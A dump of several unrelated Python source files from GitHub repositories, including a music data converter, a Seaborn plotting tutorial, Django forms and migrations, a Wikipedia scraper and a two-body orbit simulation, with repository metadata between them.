coverage[:, i] = False
# Fill in coverage gaps up to self._gap_bars.
og_coverage = coverage.copy()
for j in range(total_bars):
coverage[j] = np.any(
og_coverage[
max(0, j-self._gap_bars):min(total_bars, j+self._gap_bars) + 1],
axis=0)
# Take cross product of instruments from each class and compute combined
# encodings where they overlap.
seqs = []
for grp in itertools.product(
instruments_by_type[self.InstrumentType.MEL],
instruments_by_type[self.InstrumentType.BASS],
instruments_by_type[self.InstrumentType.DRUMS]):
# Consider an instrument covered within gap_bars from the end if any of
# the other instruments are. This allows more leniency when re-encoding
# slices.
grp_coverage = np.all(coverage[:, grp], axis=1)
grp_coverage[:self._gap_bars] = np.any(coverage[:self._gap_bars, grp])
grp_coverage[-self._gap_bars:] = np.any(coverage[-self._gap_bars:, grp])
for j in range(total_bars - self._slice_bars + 1):
if np.all(grp_coverage[j:j + self._slice_bars]):
start_step = j * self._steps_per_bar
end_step = (j + self._slice_bars) * self._steps_per_bar
seqs.append(np.concatenate(
[encoded_instruments[i][start_step:end_step] for i in grp],
axis=-1))
return ConverterTensors(inputs=seqs, outputs=seqs)
def _to_notesequences(self, samples):
output_sequences = []
dim_ranges = np.cumsum(self._split_output_depths)
for s in samples:
mel_ns = self._melody_converter.to_notesequences(
[s[:, :dim_ranges[0]]])[0]
bass_ns = self._melody_converter.to_notesequences(
[s[:, dim_ranges[0]:dim_ranges[1]]])[0]
drums_ns = self._drums_converter.to_notesequences(
[s[:, dim_ranges[1]:]])[0]
for n in bass_ns.notes:
n.instrument = 1
n.program = ELECTRIC_BASS_PROGRAM
for n in drums_ns.notes:
n.instrument = 9
ns = mel_ns
ns.notes.extend(bass_ns.notes)
ns.notes.extend(drums_ns.notes)
ns.total_time = max(
mel_ns.total_time, bass_ns.total_time, drums_ns.total_time)
output_sequences.append(ns)
return output_sequences
def count_examples(examples_path, data_converter,
file_reader=tf.python_io.tf_record_iterator):
"""Counts the number of examples produced by the converter from files."""
filenames = tf.gfile.Glob(examples_path)
num_examples = 0
for f in filenames:
tf.logging.info('Counting examples in %s.', f)
reader = file_reader(f)
for item_str in reader:
item = data_converter.str_to_item_fn(item_str)
tensors = data_converter.to_tensors(item)
num_examples += len(tensors.inputs)
tf.logging.info('Total examples: %d', num_examples)
return num_examples
def get_dataset(
config,
num_threads=1,
tf_file_reader=tf.data.TFRecordDataset,
prefetch_size=4,
is_training=False):
"""Get input tensors from dataset for training or evaluation.
Args:
config: A Config object containing dataset information.
num_threads: The number of threads to use for pre-processing.
tf_file_reader: The tf.data.Dataset class to use for reading files.
prefetch_size: The number of batches to prefetch. Disabled when 0.
is_training: Whether or not the dataset is used in training. Determines
whether dataset is shuffled and repeated, etc.
Returns:
A tf.data.Dataset containing input, output, control, and length tensors.
"""
batch_size = config.hparams.batch_size
examples_path = (
config.train_examples_path if is_training else config.eval_examples_path)
note_sequence_augmenter = (
config.note_sequence_augmenter if is_training else None)
data_converter = config.data_converter
data_converter.is_training = is_training
tf.logging.info('Reading examples from: %s', examples_path)
num_files = len(tf.gfile.Glob(examples_path))
files = tf.data.Dataset.list_files(examples_path)
if is_training:
files = files.apply(
tf.contrib.data.shuffle_and_repeat(buffer_size=num_files))
reader = files.apply(
tf.contrib.data.parallel_interleave(
tf_file_reader,
cycle_length=num_threads,
sloppy=True))
def _remove_pad_fn(padded_seq_1, padded_seq_2, padded_seq_3, length):
if length.shape.ndims == 0:
return (padded_seq_1[0:length], padded_seq_2[0:length],
padded_seq_3[0:length], length)
else:
# Don't remove padding for hierarchical examples.
return padded_seq_1, padded_seq_2, padded_seq_3, length
dataset = reader
if note_sequence_augmenter is not None:
dataset = dataset.map(note_sequence_augmenter.tf_augment)
dataset = (dataset
.map(data_converter.tf_to_tensors,
num_parallel_calls=num_threads)
.flat_map(lambda *t: tf.data.Dataset.from_tensor_slices(t))
.map(_remove_pad_fn))
if is_training:
dataset = dataset.shuffle(buffer_size=batch_size * 4)
dataset = dataset.padded_batch(batch_size, dataset.output_shapes)
if prefetch_size:
dataset = dataset.prefetch(prefetch_size)
return dataset
|
[
"noreply@github.com"
] |
SeanHsieh.noreply@github.com
|
87eb5b823f9ba9b24000e7cc2baa16e31afd600b
|
3f34ecc7d4e9fef6d3ab3b2114fe5f1431744ae8
|
/mypy/3/3.5.str_fromat.py
|
be0240d0760a2338f4bffbce59da625d8c19605c
|
[] |
no_license
|
wcybxzj/learing_dive_into_python
|
386101f4674b2e6d4b176cc4109b95b98c3024b7
|
40c456eb2afe4de421bb7e9fedd4f9401b4213a6
|
refs/heads/master
| 2021-01-10T01:01:42.361133
| 2015-02-07T14:48:23
| 2015-02-07T14:48:23
| 29,670,309
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
uid ="sa"
pwd = "secret"
# 两种方式结构完全相同
print pwd +' is password '+ uid
print '%s is password %s' % (pwd, uid)
userCount = 6
print "User connected:%d" % (userCount)
try:
print "User connected" + userCount
except TypeError:
print 'int cant connect with str'
#数值的格式化
print "Today's stock price:%f" % 50.4625
print "Today's stock price:%.2f" % 50.4625
print "Today's stock price:%+.2f" % 1.5
|
[
"virgo86ybx@gmail.com"
] |
virgo86ybx@gmail.com
|
6ca28a1331aa11b8585b3149fa132846aa5c8bcc
|
da2d6c22dd1b389175ad303a729ff1f2a82ba9a8
|
/Seaborn/Seaborn.py
|
680c9d2ba8d68112331870bf2b384eaa30a2dcbe
|
[] |
no_license
|
hmtalha786/Data-Science
|
05019dc2e3745899ecfad40deec0e039b779a914
|
b322fc42a7babd29947f7bea049bb0dcf4c2bc19
|
refs/heads/master
| 2023-03-22T04:12:15.364694
| 2021-03-13T17:28:59
| 2021-03-13T17:28:59
| 335,062,509
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,866
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Seaborn Tutorial
# ### Imports
# In[ ]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# In[ ]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[ ]:
# Auto reloads notebook when changes are made
get_ipython().run_line_magic('reload_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
# ### Import Data
# In[ ]:
# You can import custom data
cs_df = pd.read_csv('ComputerSales.csv')
# In[ ]:
# Seaborn provides built in datasets
print(sns.get_dataset_names())
# In[ ]:
# Load a built in dataset based on US State car crash percentages
crash_df = sns.load_dataset('car_crashes')
# # Distribution Plots
# ### Distribution Plot
# In[ ]:
# Provides a way to look at a univariate distribution.
# A univeriate distribution provides a distribution for one variable
# Kernal Density Estimation with a Histogram is provided
# kde=False removes the KDE
# Bins define how many buckets to divide the data up into between intervals
# For example put all profits between $10 and $20 in this bucket
sns.distplot(crash_df['not_distracted'], kde=False, bins=25)
# ### Joint Plot
# In[ ]:
# Jointplot compares 2 distributions and plots a scatter plot by default
# As we can see as people tend to speed they also tend to drink & drive
# With kind you can create a regression line with kind='reg'
# You can create a 2D KDE with kind='kde'
# Kernal Density Estimation estimates the distribution of data
# You can create a hexagon distribution with kind='hex'
sns.jointplot(x='speeding', y='alcohol', data=crash_df, kind='reg')
# ### KDE Plot
# In[ ]:
# Get just the KDE plot
sns.kdeplot(crash_df['alcohol'])
# ### Pair Plots
# In[ ]:
# Pair Plot plots relationships across the entire data frames numerical values
sns.pairplot(crash_df)
# Load data on tips
tips_df = sns.load_dataset('tips')
# With hue you can pass in a categorical column and the charts will be colorized
# You can use color maps from Matplotlib to define what colors to use
# sns.pairplot(tips_df, hue='sex', palette='Blues')
# ### Rug Plots
# In[ ]:
# Plots a single column of datapoints in an array as sticks on an axis
# With a rug plot you'll see a more dense number of lines where the amount is
# most common. This is like how a histogram is taller where values are more common
sns.rugplot(tips_df['tip'])
# ### Styling
# In[ ]:
# You can set styling for your axes and grids
# white, darkgrid, whitegrid, dark, ticks
sns.set_style('white')
# In[ ]:
# You can use figure sizing from Matplotlib
plt.figure(figsize=(8,4))
# In[ ]:
# Change size of lables, lines and other elements to best fit
# how you will present your data (paper, talk, poster)
sns.set_context('paper', font_scale=1.4)
# In[ ]:
sns.jointplot(x='speeding', y='alcohol', data=crash_df, kind='reg')
# In[ ]:
# Get rid of spines
# You can turn of specific spines with right=True, left=True
# bottom=True, top=True
sns.despine(left=False, bottom=False)
# # Categorical Plots
# ### Bar Plots
# In[ ]:
# Focus on distributions using categorical data in reference to one of the numerical
# columns
# Aggregate categorical data based on a function (mean is the default)
# Estimate total bill amount based on sex
# With estimator you can define functions to use other than the mean like those
# provided by NumPy : median, std, var, cov or make your own functions
sns.barplot(x='sex',y='total_bill',data=tips_df, estimator=np.median)
# ### Count Plot
# In[ ]:
# A count plot is like a bar plot, but the estimator is counting
# the number of occurances
sns.countplot(x='sex',data=tips_df)
# ### Box Plot
# In[ ]:
plt.figure(figsize=(14,9))
sns.set_style('darkgrid')
# A box plot allows you to compare different variables
# The box shows the quartiles of the data. The bar in the middle is the median and
# the box extends 1 standard deviation from the median
# The whiskers extend to all the other data aside from the points that are considered
# to be outliers
# Hue can add another category being sex
# We see men spend way more on Friday versus less than women on Saturday
sns.boxplot(x='day',y='total_bill',data=tips_df, hue='sex')
# Moves legend to the best position
plt.legend(loc=0)
# ### Violin Plot
# In[ ]:
# Violin Plot is a combination of the boxplot and KDE
# While a box plot corresponds to data points, the violin plot uses the KDE estimation
# of the data points
# Split allows you to compare how the categories compare to each other
sns.violinplot(x='day',y='total_bill',data=tips_df, hue='sex',split=True)
# ### Strip Plot
# In[ ]:
plt.figure(figsize=(8,5))
# The strip plot draws a scatter plot representing all data points where one
# variable is categorical. It is often used to show all observations with
# a box plot that represents the average distribution
# Jitter spreads data points out so that they aren't stacked on top of each other
# Hue breaks data into men and women
# Dodge separates the men and women data
sns.stripplot(x='day',y='total_bill',data=tips_df, jitter=True,
hue='sex', dodge=True)
# ### Swarm Plot
# In[ ]:
# A swarm plot is like a strip plot, but points are adjusted so they don't overlap
# It looks like a combination of the violin and strip plots
# sns.swarmplot(x='day',y='total_bill',data=tips_df)
# In[ ]:
# You can stack a violin plot with a swarm
sns.violinplot(x='day',y='total_bill',data=tips_df)
sns.swarmplot(x='day',y='total_bill',data=tips_df, color='white')
# ### Palettes
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_style('dark')
sns.set_context('talk')
# In[ ]:
# You can use Matplotlibs color maps for color styling
# https://matplotlib.org/3.3.1/tutorials/colors/colormaps.html
sns.stripplot(x='day',y='total_bill',data=tips_df, hue='sex', palette='seismic')
# In[ ]:
# Add the optional legend with a location number (best: 0,
# upper right: 1, upper left: 2, lower left: 3, lower right: 4,
# https://matplotlib.org/3.3.1/api/_as_gen/matplotlib.pyplot.legend.html)
# or supply a tuple of x & y from lower left
plt.legend(loc=0)
# # Matrix Plots
# ### Heatmaps
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# To create a heatmap with data you must have data set up as a matrix where variables are on the columns and rows
# In[ ]:
# Correlation tells you how influential a variable is on the result
# So we see that n previous accident is heavily correlated with accidents, while the insurance premium is not
crash_mx = crash_df.corr()
# In[ ]:
# Create the heatmap, add annotations and a color map
sns.heatmap(crash_mx, annot=True, cmap='Blues')
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# We can create a matrix with an index of month, columns representing years
# and the number of passengers for each
# We see that flights have increased over time and that most people travel in
# July and August
flights = sns.load_dataset("flights")
flights = flights.pivot_table(index='month', columns='year', values='passengers')
# In[ ]:
# You can separate data with lines
sns.heatmap(flights, cmap='Blues', linecolor='white', linewidth=1)
# ### Cluster Map
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# A Cluster map is a hierarchically clustered heatmap
# The distance between points is calculated, the closest are joined, and this
# continues for the next closest (It compares columns / rows of the heatmap)
# This is data on iris flowers with data on petal lengths
iris = sns.load_dataset("iris")
# Return values for species
# species = iris.pop("species")
# sns.clustermap(iris)
# In[ ]:
# With our flights data we can see that years have been reoriented to place
# like data closer together
# You can see clusters of data for July & August for the years 59 & 60
# standard_scale normalizes the data to focus on the clustering
sns.clustermap(flights,cmap="Blues", standard_scale=1)
# ### PairGrid
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# You can create a grid of different plots with complete control over what is displayed
# Create the empty grid system using the provided data
# Colorize based on species
# iris_g = sns.PairGrid(iris, hue="species")
# In[ ]:
# Put a scatter plot across the upper, lower and diagonal
# iris_g.map(plt.scatter)
# In[ ]:
# Put a histogram on the diagonal
# iris_g.map_diag(plt.hist)
# And a scatter plot every place else
# iris_g.map_offdiag(plt.scatter)
# In[ ]:
# Have different plots in upper, lower and diagonal
# iris_g.map_upper(plt.scatter)
# iris_g.map_lower(sns.kdeplot)
# In[ ]:
# You can define define variables for x & y for a custom grid
iris_g = sns.PairGrid(iris, hue="species",
x_vars=["sepal_length", "sepal_width"],
y_vars=["petal_length", "petal_width"])
iris_g.map(plt.scatter)
# In[ ]:
# Add a legend last
iris_g.add_legend()
# ### Facet Grid
# In[ ]:
# Can also print multiple plots in a grid in which you define columns & rows
# Get histogram for smokers and non with total bill for lunch & dinner
tips_fg = sns.FacetGrid(tips_df, col='time', row='smoker')
# In[ ]:
# You can pass in attributes for the histogram
tips_fg.map(plt.hist, "total_bill", bins=8)
# In[ ]:
# Create a scatter plot with data on total bill & tip (You need to parameters)
tips_fg.map(plt.scatter, "total_bill", "tip")
# In[ ]:
# We can assign variables to different colors and increase size of grid
# Aspect is 1.3 x the size of height
# You can change the order of the columns
# Define the palette used
tips_fg = sns.FacetGrid(tips_df, col='time', hue='smoker', height=4, aspect=1.3,
col_order=['Dinner', 'Lunch'], palette='Set1')
tips_fg.map(plt.scatter, "total_bill", "tip", edgecolor='w')
# In[ ]:
# Define size, linewidth and assign a color of white to markers
kws = dict(s=50, linewidth=.5, edgecolor="w")
# Define that we want to assign different markers to smokers and non
tips_fg = sns.FacetGrid(tips_df, col='sex', hue='smoker', height=4, aspect=1.3,
hue_order=['Yes','No'],
hue_kws=dict(marker=['^', 'v']))
tips_fg.map(plt.scatter, "total_bill", "tip", **kws)
tips_fg.add_legend()
# In[ ]:
# This dataframe provides scores for different students based on the level
# of attention they could provide during testing
att_df = sns.load_dataset("attention")
# In[ ]:
# Put each person in their own plot with 5 per line and plot their scores
att_fg = sns.FacetGrid(att_df, col='subject', col_wrap=5, height=1.5)
att_fg.map(plt.plot, 'solutions', 'score', marker='.')
# ### Regression Plots
# In[ ]:
# lmplot combines regression plots with facet grid
tips_df = sns.load_dataset('tips')
tips_df.head()
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
plt.figure(figsize=(8,6))
# We can plot a regression plot studying whether total bill effects the tip
# hue is used to show separation based off of categorical data
# We see that males tend to tip slightly more
# Define different markers for men and women
# You can effect the scatter plot by passing in a dictionary for styling of markers
sns.lmplot(x='total_bill', y='tip', hue='sex', data=tips_df, markers=['o', '^'],
scatter_kws={'s': 100, 'linewidth': 0.5, 'edgecolor': 'w'})
# In[ ]:
# You can separate the data into separate columns for day data
# sns.lmplot(x='total_bill', y='tip', col='sex', row='time', data=tips_df)
tips_df.head()
# Makes the fonts more readable
sns.set_context('poster', font_scale=1.4)
sns.lmplot(x='total_bill', y='tip', data=tips_df, col='day', hue='sex',
height=8, aspect=0.6)
|
[
"talhaofficialwork@gmail.com"
] |
talhaofficialwork@gmail.com
|
094285e188cc74e8c610f2daa584348e0873f7ca
|
6237a4d717a7055c9b0f1de3204554cbf5069b62
|
/UserLog/urls.py
|
4457c41a32857ba13cffcc92a2bd40f237eea06e
|
[] |
no_license
|
sylvia198591/BookProject
|
180b9072c13cad5a5f996d60946caab78ae503b1
|
eabfb6cfe63e45f7f73c1500bad6aa8d3a1c62fb
|
refs/heads/master
| 2023-03-27T00:25:10.827236
| 2021-03-22T08:43:49
| 2021-03-22T08:43:49
| 350,118,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 291
|
py
|
from django.urls import path
from UserLog import views
from django.conf.urls import url
from UserLog import views
from UserLog.views import ExampleView, CustomAuthToken
urlpatterns = [
path('api/users/',ExampleView.as_view()),
path('api/token/auth/', CustomAuthToken.as_view()),
]
|
[
"sylvia.anitha@gmail.com"
] |
sylvia.anitha@gmail.com
|
1e189f1ce03846ffe4d1f30d329b5694e3540608
|
ecdb99b66c3f40a66c7123b8f8ac8e1f2772c8da
|
/random_request.py
|
112757d9569c0e17f92bd403ddb01e0e7927486a
|
[] |
no_license
|
kannanenator/haikus-from-wikipedia
|
ef8168e310bb8190a6b457c5d2f4be09db21bc6f
|
a404033fcd8f4850e150b0a820d8be4974cd6eb4
|
refs/heads/master
| 2020-04-05T23:09:27.083860
| 2019-11-04T00:05:19
| 2019-11-04T00:05:19
| 57,425,787
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
import requests
from bs4 import BeautifulSoup
import sys
# runs on python 3.5
def request_random():
'''Request random wikipedia article, return html_doc'''
r = requests.get('https://en.wikipedia.org/wiki/Special:Random')
return r.content, r.url
def parse_article(article):
'''parse html and get relevant (main paragraph) text out the article'''
soup = BeautifulSoup(article, 'html.parser')
paragraphs = soup.find_all("p")
ps = (" ").join([elem.text for elem in paragraphs])
title = soup.find("h1", id="firstHeading").text
return ps, title
def get_random_text():
'''puts the full request together'''
html_doc, url = request_random()
parsed, title = parse_article(html_doc)
return parsed, title, url
if __name__ == "__main__":
print(get_random_text())
|
[
"kannanenator.gmail.com"
] |
kannanenator.gmail.com
|
1140e573f0619909625e7218b1ff94f7d6402bec
|
dc849231858f6a1378c8fb52e81035d20e48e321
|
/Lab3/实验代码/2/bookmanager/forms.py
|
2d4e7e98b82012568e11fb05f6f64edd4ae53506
|
[] |
no_license
|
Fooo0/Software-Engineering
|
05413854f9ee54b14034bcb0f182643b2fb985de
|
47c65bc7b291352ea590ea168bf30a32b1e25363
|
refs/heads/master
| 2021-01-10T17:20:59.748108
| 2016-02-20T14:35:52
| 2016-02-20T14:35:52
| 52,155,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,662
|
py
|
# -*- coding: utf-8 -*-
from django import forms
from bookmanager.models import Book, Author
class Form_Book_new(forms.ModelForm):
class Meta:
model = Book
fields = ('Title','AuthorID','Publisher',
'PublishDate', 'Price')
error_messages = {
'Title': {'required' : '请填写书名'},
'AuthorID' : {'required' : '请填写作者ID'},
'Publisher' : {'required' : '请填写出版社'},
'Price' : {'required' : '请填写价格'},
}
def __init__(self, *args, **kwargs):
super(Form_Book_new, self).__init__(*args, **kwargs)
self.fields['PublishDate'].widget = forms.TextInput(attrs={
'placeholder': "格式举例:1995-05-28"})
class Form_Book_update(forms.ModelForm):
class Meta:
model = Book
fields = ('AuthorID','Publisher',
'PublishDate', 'Price')
error_messages = {
'AuthorID' : {'required' : '请填写作者ID'},
'Publisher' : {'required' : '请填写出版社'},
'Price' : {'required' : '请填写价格'},
}
def __init__(self, *args, **kwargs):
super(Form_Book_update, self).__init__(*args, **kwargs)
self.fields['PublishDate'].widget = forms.TextInput(attrs={
'placeholder': "格式举例:1995-05-28"})
class Form_Author(forms.ModelForm):
class Meta:
model = Author
fields = ('Name','Age','Country',)
error_messages = {
'Name': {'required' : '请填写作者姓名',},
'Country' : {'required' : '请填写作者国别',},
}
|
[
"xiao-fei-fei@qq.com"
] |
xiao-fei-fei@qq.com
|
706672dfd171b2790a1fdce2493d5e185f065859
|
35831bbf46ee61be24a27983deaafe0247b0d141
|
/2-body-sim.py
|
8a0e9f7a8a8c937a1352b14fe2bce9da5acfeb30
|
[] |
no_license
|
austinpower1258/3-Body-Problem
|
15ae4b8c93b30b433e574f4fcf0f17fa8d7081c3
|
efe344e299fb9dd7b6ab960a177b4becbfdfa96e
|
refs/heads/main
| 2023-06-27T08:34:37.893727
| 2021-08-03T04:48:20
| 2021-08-03T04:48:20
| 392,190,318
| 0
| 0
| null | 2021-08-03T04:47:37
| 2021-08-03T04:37:43
| null |
UTF-8
|
Python
| false
| false
| 2,799
|
py
|
#Utilizing Newton's Law of Gravitation to model the 3 Body Problem.
import scipy as sci
import scipy.integrate
import matplotlib.pyplot as plt
from mpt_toolkits.mplot3d import Axes3D
from matplotlib import animation
G = 6.6741e-11
m_nd = 1.989e+30 #mass of sun
r_nd = 5.326e+12 #distance between stars in Alpha Centauri
v_nd = 30000 #relative velocity of earth around sun
t_nd=79.91*365*24*3600*0.51 #orbital period of Alpha Centauri
K1=G*t_nd*m_nd/(r_nd**2*v_nd)
K2=v_nd*t_nd/r_nd
#Define masses
m1=1.1 #Alpha Centauri A
m2=0.907 #Alpha Centauri B
#Define initial position vectors
r1=[-0.5,0,0] #m
r2=[0.5,0,0] #m
#Convert pos vectors to arrays
r1=sci.array(r1,dtype="float64")
r2=sci.array(r2,dtype="float64")
#Find Centre of Mass
r_com=(m1*r1+m2*r2)/(m1+m2)
#Define initial velocities
v1=[0.01,0.01,0] #m/s
v2=[-0.05,0,-0.1] #m/s
#Convert velocity vectors to arrays
v1=sci.array(v1,dtype="float64")
v2=sci.array(v2,dtype="float64")
#Find velocity of COM
v_com=(m1*v1+m2*v2)/(m1+m2)
#A function defining the equations of motion
def TwoBodyEquations(w,t,G,m1,m2):
r1=w[:3]
r2=w[3:6]
v1=w[6:9]
v2=w[9:12]
r=sci.linalg.norm(r2-r1) #Calculate magnitude or norm of vector
dv1bydt=K1*m2*(r2-r1)/r**3
dv2bydt=K1*m1*(r1-r2)/r**3
dr1bydt=K2*v1
dr2bydt=K2*v2
r_derivs=sci.concatenate((dr1bydt,dr2bydt))
derivs=sci.concatenate((r_derivs,dv1bydt,dv2bydt))
return derivs
#Package initial parameters
init_params=sci.array([r1,r2,v1,v2]) #create array of initial params
init_params=init_params.flatten() #flatten array to make it 1D
time_span=sci.linspace(0,8,500) #8 orbital periods and 500 points
#Run the ODE solver
two_body_sol=sci.integrate.odeint(TwoBodyEquations,init_params,time_span,args=(G,m1,m2))
r1_sol=two_body_sol[:,:3]
r2_sol=two_body_sol[:,3:6]
#Create figure
fig=plt.figure(figsize=(15,15))
#Create 3D axes
ax=fig.add_subplot(111,projection="3d")
#Plot the orbits
ax.plot(r1_sol[:,0],r1_sol[:,1],r1_sol[:,2],color="darkblue")
ax.plot(r2_sol[:,0],r2_sol[:,1],r2_sol[:,2],color="tab:red")
#Plot the final positions of the stars
ax.scatter(r1_sol[-1,0],r1_sol[-1,1],r1_sol[-1,2],color="darkblue",marker="o",s=100,label="Alpha Centauri A")
ax.scatter(r2_sol[-1,0],r2_sol[-1,1],r2_sol[-1,2],color="tab:red",marker="o",s=100,label="Alpha Centauri B")
#Add a few more bells and whistles
ax.set_xlabel("x-coordinate",fontsize=14)
ax.set_ylabel("y-coordinate",fontsize=14)
ax.set_zlabel("z-coordinate",fontsize=14)
ax.set_title("Visualization of orbits of stars in a two-body system\n",fontsize=14)
ax.legend(loc="upper left",fontsize=14)
#Find location of COM
rcom_sol=(m1*r1_sol+m2*r2_sol)/(m1+m2)
#Find location of Alpha Centauri A w.r.t COM
r1com_sol=r1_sol-rcom_sol
#Find location of Alpha Centauri B w.r.t COM
r2com_sol=r2_sol-rcom_sol
|
[
"austinpower1258@gmail.com"
] |
austinpower1258@gmail.com
|
0af3b29891b6fbebdeee1c25209ba88f7d067e45
|
362591481e20b0cfb65d92829698d7defe22c4c4
|
/themarket/products/migrations/0001_initial.py
|
37b01d4360f441392b8fe107fafc8561743f5801
|
[] |
no_license
|
wahello/themarket
|
595025d62e1f7b00a78798475b2d8e9a2e2fe443
|
23fb34d7e850f50d9c7defd0de2649611086ea0f
|
refs/heads/master
| 2020-08-01T19:43:17.681826
| 2018-09-03T11:27:05
| 2018-09-03T11:27:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 909
|
py
|
# Generated by Django 2.0.6 on 2018-08-02 11:57
from django.db import migrations, models
import products.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(blank=True, unique=True)),
('description', models.TextField()),
('price', models.DecimalField(decimal_places=2, default=19.99, max_digits=25)),
('image', models.ImageField(blank=True, null=True, upload_to=products.models.upload_image_path)),
('featured', models.BooleanField(default=False)),
],
),
]
|
[
"peadarh10@gmail.com"
] |
peadarh10@gmail.com
|
5cfdb1953496c336c527e9960195efc031c7c309
|
c09b12ec1e56ff679c9795c48d828d832630e49f
|
/hw6/webapps/urls.py
|
f42d5dabb59476e001a7d847daa9524edeb0bd7d
|
[] |
no_license
|
justinguo/Web-Application-Development
|
9bceda6bb3359eea2f5f03b88b638218d7a51f4f
|
23eb79359b0ad3b202b32d55ba33ccd1e40d4d6a
|
refs/heads/master
| 2021-01-21T05:16:55.119537
| 2017-02-25T22:15:51
| 2017-02-25T22:15:51
| 83,166,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'', include('socialnetwork.urls')),
)
|
[
"justinguo317@gmail.com"
] |
justinguo317@gmail.com
|
a64a605f728f7e372b162f11ff7618200ec903bc
|
beebc5ff44407f3f3a4c1463cd09f0917dbe5391
|
/pytype/tools/merge_pyi/test_data/simple.comment.py
|
1b8f2e1604e2a1c309c4cf80b2abc6b62ca7c58b
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
mraarif/pytype
|
4f190cb2591896133761295f3d84d80602dffb58
|
546e8b8114c9af54a409985a036398c4f6955677
|
refs/heads/master
| 2023-01-23T09:48:06.239353
| 2020-12-02T06:08:27
| 2020-12-02T06:08:27
| 303,069,915
| 1
| 0
|
NOASSERTION
| 2020-12-02T06:08:28
| 2020-10-11T07:53:55
| null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from typing import Any
def f1(a, b):
# type: (Any, Any) -> r1
"""Doc"""
return a+b
def f2(a):
# type: (Any) -> r2
return 1
def f3(a):
return 1
|
[
"rechen@google.com"
] |
rechen@google.com
|
f4cf95f415d6cafda447424f9f68a0875e3b4189
|
9cba18b1811fb6d4447627b6f6b64c18167cd590
|
/sclp028.py
|
ed5373544f969af84b6b6ec87aedd7649596f469
|
[] |
no_license
|
kh4r00n/SoulCodeLP
|
45e10778c3b894dbaadad46b213d25daf557f2a0
|
a104852d26edf0b11b23ec2545c9422e9ba42c6e
|
refs/heads/main
| 2023-08-10T22:46:01.123331
| 2021-10-05T03:02:36
| 2021-10-05T03:02:36
| 411,645,788
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
'''
Crie u programa que leia um número de 3 dígitos
'''
num = int(input('Digite um número: '))
while num < 100 or num > 999:
num = int(input('O numero nao tem 3 digitos. Digite novamente:'))
|
[
"noreply@github.com"
] |
kh4r00n.noreply@github.com
|
8a42837ead36a6a7bd40e72a709707c10b2da8a9
|
6f23d4d5cfd3b464457c6622e662af87bf957125
|
/crudapp/migrations/0010_auto_20200819_1604.py
|
80dc406f0446374f0e353312f24fc4bcc9316965
|
[] |
no_license
|
RohiniPunde/crud
|
31c411662350d1f85f334e3cad3adcf63c2098a9
|
a2ff0b051234f3c1584b8dadbc58ff01d9222730
|
refs/heads/master
| 2022-12-15T18:45:37.175833
| 2020-08-29T16:33:37
| 2020-08-29T16:33:37
| 287,257,366
| 0
| 0
| null | 2020-08-29T16:33:38
| 2020-08-13T11:09:54
|
Python
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
# Generated by Django 3.0.3 on 2020-08-19 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crudapp', '0009_auto_20200819_1556'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='phone',
field=models.BigIntegerField(null=True),
),
]
|
[
"punderohini@gmail.com"
] |
punderohini@gmail.com
|
4c3c2cc9d54d334c6c07cfddc33d6c9c853a2442
|
4be56098894a95da5964622fc4102b69e4530ab6
|
/题库/1032.等式方程的可满足性.py
|
7023bb9ec8392f37b654506730bd4b9421433cc1
|
[] |
no_license
|
ACENDER/LeetCode
|
7c7c7ecc8d0cc52215272f47ec34638637fae7ac
|
3383b09ab1246651b1d7b56ab426a456f56a4ece
|
refs/heads/master
| 2023-03-13T19:19:07.084141
| 2021-03-15T09:29:21
| 2021-03-15T09:29:21
| 299,332,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1032.等式方程的可满足性.py
|
[
"1641429327@qq.com"
] |
1641429327@qq.com
|
eb357b4506f5f70ef0b18f378e976d94d6b2f4e8
|
3943103da2b3bef6b8b60b5f20ae901be7e4d61b
|
/602/day02.py
|
553fd27c2021b09c7e781bfcd47b81a9e91d4215
|
[] |
no_license
|
shangtengjun/spider
|
03006934f200e0efb5a4636a82fba7a1a576dd04
|
dc503ad949cbde7447b52425d66a94df7b43c19b
|
refs/heads/master
| 2022-12-09T21:46:40.386697
| 2020-09-09T08:33:17
| 2020-09-09T08:33:17
| 281,431,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,429
|
py
|
# coding:utf-8
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"}
s = 0
